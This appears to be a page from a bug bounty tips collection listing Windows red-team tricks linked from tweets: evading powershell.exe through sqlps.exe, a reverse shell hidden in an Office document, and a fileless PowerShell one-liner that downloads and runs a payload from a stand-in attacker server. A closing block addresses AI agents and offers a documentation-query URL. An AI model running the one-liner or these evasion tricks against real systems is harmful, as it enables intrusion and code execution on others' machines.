# Windows

* [Want to run powershell without using powershell.exe! If your target have Microsoft SQL Server installed use sqlps.exe#pentest #redteam](https://twitter.com/MrUn1k0d3r/status/1011996256212865024)
* [Generating a Reverse shell in Powershell, and then embedding it in an Office Document. #pentesting #redteam #BugBounty](https://twitter.com/hexG0d/status/1011136696078032896)
* [Download and execute a #PowerShell script without touching the disk (fileless).\
  powershell -exec bypass -c "iwr('http://attacker-server/payload.ps1')|iex"#pentest #postexploitation #oscp](https://twitter.com/wincmdfu/status/1012571139682340866)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gowsundar.gitbook.io/book-of-bugbounty-tips/windows.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
